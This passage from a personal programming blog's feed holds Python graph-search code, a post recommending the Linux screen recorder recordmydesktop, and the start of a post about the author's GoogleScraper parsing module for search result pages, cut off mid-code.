<span class="bp">self</span><span class="o">.</span><span class="n">discovery_time</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">clock</span><span class="p">()</span>
<span class="k">elif</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">finishing_time</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">clock</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_visited</span> <span class="o">=</span> <span class="n">value</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
<span class="k">def</span> <span class="fm">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
<span class="c1"># Let's define our sample graph and represent it in an adjacency list.</span>
<span class="c1"># This means that for every node, we store the outgoing edges in a list.</span>
<span class="n">Nodes</span> <span class="o">=</span> <span class="p">[</span><span class="n">Node</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">)]</span>
<span class="n">Graph</span> <span class="o">=</span> <span class="p">{</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">3</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">3</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">8</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">2</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">6</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">4</span><span class="p">]],</span>
<span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">1</span><span class="p">]],</span>
<span class="p">}</span>
<span class="sd">"""</span>
<span class="sd">Depth-First-Search</span>
<span class="sd">Running time: O(|V| + |E|)</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">depth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">):</span>
<span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
<span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
<span class="k">if</span> <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">depth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">depth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">):</span>
<span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">neighbor</span> <span class="ow">in</span> <span class="n">node</span><span class="o">.</span><span class="n">neighbors</span><span class="p">(</span><span class="n">Graph</span><span class="p">):</span>
<span class="k">if</span> <span class="n">neighbor</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">depth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">neighbor</span><span class="p">)</span>
<span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">2</span>
<span class="sd">"""</span>
<span class="sd">Breadth-First-Search</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">breadth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">):</span>
<span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
<span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
<span class="k">if</span> <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">breadth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">breadth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">):</span>
<span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">queue</span> <span class="o">=</span> <span class="n">deque</span><span class="p">([</span><span class="n">node</span><span class="p">])</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">u</span> <span class="o">=</span> <span class="n">queue</span><span class="o">.</span><span class="n">popleft</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span><span class="p">:</span>
<span class="k">break</span>
<span class="k">for</span> <span class="n">neighbor</span> <span class="ow">in</span> <span class="n">u</span><span class="o">.</span><span class="n">neighbors</span><span class="p">(</span><span class="n">Graph</span><span class="p">):</span>
<span class="k">if</span> <span class="n">neighbor</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">neighbor</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">queue</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">neighbor</span><span class="p">)</span>
<span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">2</span>
<span class="k">def</span> <span class="nf">print_topological</span><span class="p">(</span><span class="n">Nodes</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Toplogical sort of the Graph:'</span><span class="p">)</span>
<span class="c1"># prints a topological sort</span>
<span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">Nodes</span><span class="p">,</span> <span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">obj</span><span class="p">:</span> <span class="n">obj</span><span class="o">.</span><span class="n">finishing_time</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\t</span><span class="s1"> </span><span class="si">{}</span><span class="s1">: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">node</span><span class="p">,</span> <span class="n">node</span><span class="o">.</span><span class="n">finishing_time</span><span class="p">))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Using Depth-First-Search'</span><span class="p">)</span>
<span class="c1"># should print each node exactly once</span>
<span class="n">depth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">)</span>
<span class="n">print_topological</span><span class="p">(</span><span class="n">Nodes</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="c1"># the same buth with Breadth-First-Search</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Using Breadth-First-Search'</span><span class="p">)</span>
<span class="n">breadth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">)</span>
<span class="n">print_topological</span><span class="p">(</span><span class="n">Nodes</span><span class="p">)</span>
</code></pre></div>Very good program to record audio and desktop on Linux!2015-01-18T15:04:00+01:002015-01-18T15:04:00+01:00Nikolai Tschachertag:incolumitas.com,2015-01-18:/2015/01/18/very-good-program-to-record-audio-and-desktop-on-linux/<h3>First post in the new year!</h3>
<p>Hey</p>
<p>Happy new year to all of you and let 2015 be a succesful year for us
all!</p>
<p>My <strong>New Year's resolution</strong> is to write at least two blog posts every
month and try to get my scraping service on
<a href="http://scrapeulous.com" title="my scraping service">scrapeulous.com</a> up and
running!</p>
<h3>Good program to record the desktop/audio on linux</h3>
<p>But what I really wanted to share today is an awesome way to record your
desktop with audio on Linux. I tried my luck several times with VLC, but
it's a freaking pain in the ass to use. Furthermore, VLC will probably
never be able to capture the desktop with audio (See <a href="http://superuser.com/questions/612186/how-to-capture-screen-video-with-audio-using-vlc-media-player">this stackoverflow
thread</a>
for more info).</p>
<p>But I just found an wonderful alternative (one could almost assume that
I am advertisting, which is not the case, I swear!):</p>
<p><a href="http://wiki.ubuntuusers.de/recordMyDesktop">http://wiki.ubuntuusers.de/recordMyDesktop</a></p>
<p>If you want to visit the home page of the program, <a href="http://recordmydesktop.sourceforge.net/about.php">click
here</a>. Although the
home page is very ugly and the program is not longer in active
development, it just works like a charm. On Ubuntu you may install it
like this:</p>
<p><code>sudo apt-get install recordmydesktop</code></p>
<p>Then go to a directory very you want …</p><h3>First post in the new year!</h3>
<p>Hey</p>
<p>Happy new year to all of you and let 2015 be a succesful year for us
all!</p>
<p>My <strong>New Year's resolution</strong> is to write at least two blog posts every
month and try to get my scraping service on
<a href="http://scrapeulous.com" title="my scraping service">scrapeulous.com</a> up and
running!</p>
<h3>Good program to record the desktop/audio on linux</h3>
<p>But what I really wanted to share today is an awesome way to record your
desktop with audio on Linux. I tried my luck several times with VLC, but
it's a freaking pain in the ass to use. Furthermore, VLC will probably
never be able to capture the desktop with audio (See <a href="http://superuser.com/questions/612186/how-to-capture-screen-video-with-audio-using-vlc-media-player">this stackoverflow
thread</a>
for more info).</p>
<p>But I just found an wonderful alternative (one could almost assume that
I am advertisting, which is not the case, I swear!):</p>
<p><a href="http://wiki.ubuntuusers.de/recordMyDesktop">http://wiki.ubuntuusers.de/recordMyDesktop</a></p>
<p>If you want to visit the home page of the program, <a href="http://recordmydesktop.sourceforge.net/about.php">click
here</a>. Although the
home page is very ugly and the program is not longer in active
development, it just works like a charm. On Ubuntu you may install it
like this:</p>
<p><code>sudo apt-get install recordmydesktop</code></p>
<p>Then go to a directory very you want to save the output file and just
enter <code>recordmydesktop</code> in a shell.</p>
<p>The program begins to record. When hitting Control-C, the capture stops
and the file is written (Which takes a bit time). Then you can play your
capture (With VLC for example).</p>
<h3>Conclusion</h3>
<p>This shows me once more what the most integral parts in the art of
software development really are:</p>
<ul>
<li>The most common usage case of the program should be it's default
behaviour!</li>
<li>Usability is the most important part of any software. Users are
frustrated very easily.</li>
<li>The program must be robust. If it doesn't work, potential customers
are drained away to the concurrence!</li>
</ul>
<p>All these points apply on recordmydesktop, which makes it very nice to
work with!</p>
<p>Hope you got something out of this.</p>Scraping and Extracting Links from any major Search Engine like Google, Yandex, Baidu, Bing and Duckduckgo2014-11-12T00:47:00+01:002014-11-12T00:47:00+01:00Nikolai Tschachertag:incolumitas.com,2014-11-12:/2014/11/12/scraping-and-extracting-links-from-any-major-search-engine-like-google-yandex-baidu-bing-and-duckduckgo/<h3>Prelude</h3>
<p>It's been quite a while since I worked on my projects. But recently I
had some motivation and energy left, which is quite nice considering my
full time university week and a programming job besides.</p>
<p>I have a <a href="https://github.com/NikolaiT/GoogleScraper" title="GoogleScraper">little project on
GitHub</a> that
I worked on every now and again in the last year or so. Recently it got
a little bit bigger (I have 115 github stars now, would've never
imagined that I ever achieve this) and I receive up to 2 mails with job
offers every week (Sorry if I cannot accept any request :( ).</p>
<p>But unfortunately my progress with this project is not as good as I want
it to be (that's probably a quite common feeling under us programmers).
It's not a problem of missing ideas and features that I want to
implement, the hard part is to extend the project without blowing legacy
code up. GoogleScraper has grown evolutionary and I am waisting <strong>a
lot</strong> of time to understand my old code. Mostly it's much better to just
erease whole modules and reimplement things completely anew. This is
essentially what I made with the parsing module.</p>
<h3>Parsing SERP pages with many search engines</h3>
<p>So I …</p><h3>Prelude</h3>
<p>It's been quite a while since I worked on my projects. But recently I
had some motivation and energy left, which is quite nice considering my
full time university week and a programming job besides.</p>
<p>I have a <a href="https://github.com/NikolaiT/GoogleScraper" title="GoogleScraper">little project on
GitHub</a> that
I worked on every now and again in the last year or so. Recently it got
a little bit bigger (I have 115 github stars now, would've never
imagined that I ever achieve this) and I receive up to 2 mails with job
offers every week (Sorry if I cannot accept any request :( ).</p>
<p>But unfortunately my progress with this project is not as good as I want
it to be (that's probably a quite common feeling under us programmers).
It's not a problem of missing ideas and features that I want to
implement, the hard part is to extend the project without blowing legacy
code up. GoogleScraper has grown evolutionary and I am waisting <strong>a
lot</strong> of time to understand my old code. Mostly it's much better to just
erease whole modules and reimplement things completely anew. This is
essentially what I made with the parsing module.</p>
<h3>Parsing SERP pages with many search engines</h3>
<p>So I rewrote the parsing.py module of GoogleScraper. From now on,
parsing happens much more stable and is more extendable. In fact,
everyone can add their own CSS selectors while subclassing the abstract
<code>Parser</code> class. For now, parsing.py support the following search
engines:</p>
<ul>
<li><a href="https://google.com">Google</a> (as before)</li>
<li><a href="http://yandex.ru/" title="Yandex">Yandex</a> (quite a nice search engine)</li>
<li><a href="http://www.bing.com" title="Bing">Bing</a> (pretty mature by now)</li>
<li><a href="http://https://search.yahoo.com" title="Yahoo">Yahoo</a> (good old google
competitor)</li>
<li><a href="http://www.baidu.com/" title="Baidu">Baidu</a> (let's dive into the asian
market ;) )</li>
<li><a href="https://duckduckgo.com" title="Duckduckgo">Duckduckgo</a> (I am very excited
about duckduck.go, because the results are clean any very easily
parsable)</li>
</ul>
<p>This means that GoogleScraper now support <strong>6 search engines</strong>. So you
can scale your scraping and compare the results between search engines.
This means much more output and statistical data for your analysis. You
can also divide your scrape jobs on the different search engines. A few
people might still say that Google is the only usable search engine.
Have you actually used an alternative recently or are you just suffering
from the <a href="http://en.wikipedia.org/wiki/Lock-in_%28decision-making%29">locked in
effect</a>?</p>
<h3>Let's play with it</h3>
<p>Well, to give you some first insight in the new functionality, lets dig
some code and see it in action:</p>
<p>To run it download the code below, save it as parsing.py and just
install the modules:</p>
<ul>
<li>lxml</li>
<li>cssselect</li>
<li>beautifulsoup4</li>
</ul>
<p>You can do so with <code>sudo pip3 install modulename</code>.</p>
<p>Now when you are ready, you can easily test the new parsing
functionality with firing such an example command in<br>
the command line:</p>
<p><code>python3 parsing.py 'http://yandex.ru/yandsearch?text=GoogleScraper&lr=178'</code></p>
<p>This will scrape the results from Yandex with the search query
<strong>GoogleScraper</strong>. You can try it out with the other search engines:
Just search in your browser, than copy and paste the url from the
address bar in the command!</p>
<p>Please note: Using this module directly makes little sense, because
requesting such urls<br>
directly without imitating a real browser (which is done in my
GoogleScraper module with faking User Agent, using selenium, PhantomJS,
...) makes<br>
the search engines sometimes return crippled html, which makes it hard
to parse.</p>
<p>But for some engines it nevertheless works quite well (for example:
yandex, google, ...).</p>
<p>Please note, the most actual version of the code can be found here:
<a href="https://github.com/NikolaiT/GoogleScraper/blob/master/GoogleScraper/parsing.py" title="parsing.py">parsing.py at
GoogleScraper</a></p>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
<span class="sd">"""</span>
<span class="sd">author: Nikolai Tschacher</span>
<span class="sd">date: 11.11.2014</span>
<span class="sd">home: incolumitas.com</span>
<span class="sd">"""</span>
<span class="c1"># TODO: Implement alternatate selectors for different SERP formats (just use a list in the CSS selector datatypes)</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">logging</span>
<span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">import</span> <span class="nn">pprint</span>
<span class="k">try</span><span class="p">:</span>
<span class="kn">from</span> <span class="nn">cssselect</span> <span class="kn">import</span> <span class="n">HTMLTranslator</span><span class="p">,</span> <span class="n">SelectorError</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">UnicodeDammit</span>
<span class="k">except</span> <span class="ne">ImportError</span> <span class="k">as</span> <span class="n">ie</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">hasattr</span><span class="p">(</span><span class="n">ie</span><span class="p">,</span> <span class="s1">'name'</span><span class="p">)</span> <span class="ow">and</span> <span class="n">ie</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'bs4'</span> <span class="ow">or</span> <span class="nb">hasattr</span><span class="p">(</span><span class="n">ie</span><span class="p">,</span> <span class="s1">'args'</span><span class="p">)</span> <span class="ow">and</span> <span class="s1">'bs4'</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">ie</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="s1">'Install bs4 with the command "sudo pip3 install beautifulsoup4"'</span><span class="p">)</span>
<span class="n">logger</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">getLogger</span><span class="p">(</span><span class="s1">'GoogleScraper'</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">InvalidSearchTypeExcpetion</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="k">pass</span>
<span class="k">class</span> <span class="nc">Parser</span><span class="p">():</span>
<span class="sd">"""Parses SERP pages.</span>
<span class="sd"> Each search engine results page (SERP) has a similar layout:</span>
<span class="sd"> The main search results are usually in a html container element (#main, .results, #leftSide).</span>
<span class="sd"> There might be separate columns for other search results (like ads for example). Then each </span>
<span class="sd"> result contains basically a link, a snippet and a description (usually some text on the</span>
<span class="sd"> target site). It's really astonishing how similar other search engines are to Google.</span>
<span class="sd"> Each child class (that can actual parse a concrete search engine results page) needs</span>
<span class="sd"> to specify css selectors for the different search types (Like normal search, news search, video search, ...).</span>
<span class="sd"> Attributes:</span>
<span class="sd"> search_results: The results after parsing.</span>
<span class="sd"> """</span>
<span class="c1"># The supported search types. For instance, Google supports Video Search, Image Search, News search</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">html</span><span class="p">,</span> <span class="n">searchtype</span><span class="o">=</span><span class="s1">'normal'</span><span class="p">):</span>
<span class="sd">"""Create new Parser instance and parse all information.</span>
<span class="sd"> Args:</span>
<span class="sd"> html: The raw html from the search engine search</span>
<span class="sd"> searchtype: The search type. By default "normal"</span>
<span class="sd"> Raises:</span>
<span class="sd"> Assertion error if the subclassed</span>
<span class="sd"> specific parser cannot handle the the settings.</span>
<span class="sd"> """</span>
<span class="k">assert</span> <span class="n">searchtype</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_types</span>
<span class="bp">self</span><span class="o">.</span><span class="n">html</span> <span class="o">=</span> <span class="n">html</span>
<span class="bp">self</span><span class="o">.</span><span class="n">searchtype</span> <span class="o">=</span> <span class="n">searchtype</span>
<span class="bp">self</span><span class="o">.</span><span class="n">dom</span> <span class="o">=</span> <span class="kc">None</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span> <span class="o">=</span> <span class="p">{}</span>
<span class="c1"># Try to parse the provided HTML string using lxml</span>
<span class="n">doc</span> <span class="o">=</span> <span class="n">UnicodeDammit</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">html</span><span class="p">,</span> <span class="n">is_html</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">HTMLParser</span><span class="p">(</span><span class="n">encoding</span><span class="o">=</span><span class="n">doc</span><span class="o">.</span><span class="n">declared_html_encoding</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">document_fromstring</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">html</span><span class="p">,</span> <span class="n">parser</span><span class="o">=</span><span class="n">parser</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">dom</span><span class="o">.</span><span class="n">resolve_base_href</span><span class="p">()</span>
<span class="c1"># lets do the actual parsing</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_parse</span><span class="p">()</span>
<span class="c1"># Apply sublcass specific behaviour after parsing has happened</span>
<span class="bp">self</span><span class="o">.</span><span class="n">after_parsing</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">_parse</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Parse the dom according to the provided css selectors.</span>
<span class="sd"> Raises: InvalidSearchTypeExcpetion if no css selectors for the searchtype could be found.</span>
<span class="sd"> """</span>
<span class="c1"># try to parse the number of results.</span>
<span class="n">attr_name</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">searchtype</span> <span class="o">+</span> <span class="s1">'_search_selectors'</span>
<span class="n">selector_dict</span> <span class="o">=</span> <span class="nb">getattr</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">attr_name</span><span class="p">,</span> <span class="kc">None</span><span class="p">)</span>
<span class="c1"># short alias because we use it so extensively</span>
<span class="n">css_to_xpath</span> <span class="o">=</span> <span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span>
<span class="c1"># get the appropriate css selectors for the num_results for the keyword</span>
<span class="n">num_results_selector</span> <span class="o">=</span> <span class="nb">getattr</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="s1">'num_results_search_selectors'</span><span class="p">,</span> <span class="kc">None</span><span class="p">)</span>
<span class="k">if</span> <span class="n">num_results_selector</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="s1">'num_results'</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">num_results_selector</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">selector_dict</span><span class="p">:</span>
<span class="k">raise</span> <span class="n">InvalidSearchTypeExcpetion</span><span class="p">(</span><span class="s1">'There is no such attribute: </span><span class="si">{}</span><span class="s1">. No selectors found'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">attr_name</span><span class="p">))</span>
<span class="k">for</span> <span class="n">result_type</span><span class="p">,</span> <span class="n">selectors</span> <span class="ow">in</span> <span class="n">selector_dict</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="n">result_type</span><span class="p">]</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">results</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span>
<span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'</span><span class="si">{container}</span><span class="s1"> </span><span class="si">{result_container}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="o">**</span><span class="n">selectors</span><span class="p">))</span>
<span class="p">)</span>
<span class="n">to_extract</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">selectors</span><span class="o">.</span><span class="n">keys</span><span class="p">())</span> <span class="o">-</span> <span class="p">{</span><span class="s1">'container'</span><span class="p">,</span> <span class="s1">'result_container'</span><span class="p">}</span>
<span class="n">selectors_to_use</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(((</span><span class="n">key</span><span class="p">,</span> <span class="n">selectors</span><span class="p">[</span><span class="n">key</span><span class="p">])</span> <span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">to_extract</span> <span class="k">if</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">selectors</span><span class="o">.</span><span class="n">keys</span><span class="p">()))</span>
<span class="k">for</span> <span class="n">index</span><span class="p">,</span> <span class="n">result</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">results</span><span class="p">):</span>
<span class="c1"># Let's add primitve support for CSS3 pseudo selectors</span>
<span class="c1"># We just need two of them</span>
<span class="c1"># ::text</span>
<span class="c1"># ::attr(someattribute)</span>
<span class="c1"># You say we should use xpath expresssions instead?</span>
<span class="c1"># Maybe you're right, but they are complicated when it comes to classes,</span>
<span class="c1"># have a look here: http://doc.scrapy.org/en/latest/topics/selectors.html</span>
<span class="n">serp_result</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">selector</span> <span class="ow">in</span> <span class="n">selectors_to_use</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="n">value</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">selector</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'::text'</span><span class="p">):</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">value</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">selector</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'::'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">attr</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'::attr\((?P.*)\)$'</span><span class="p">,</span> <span class="n">selector</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'attr'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">attr</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">value</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">selector</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'::'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">attr</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">value</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">selector</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">pass</span>
<span class="n">serp_result</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span>
<span class="k">if</span> <span class="n">serp_result</span><span class="p">:</span>
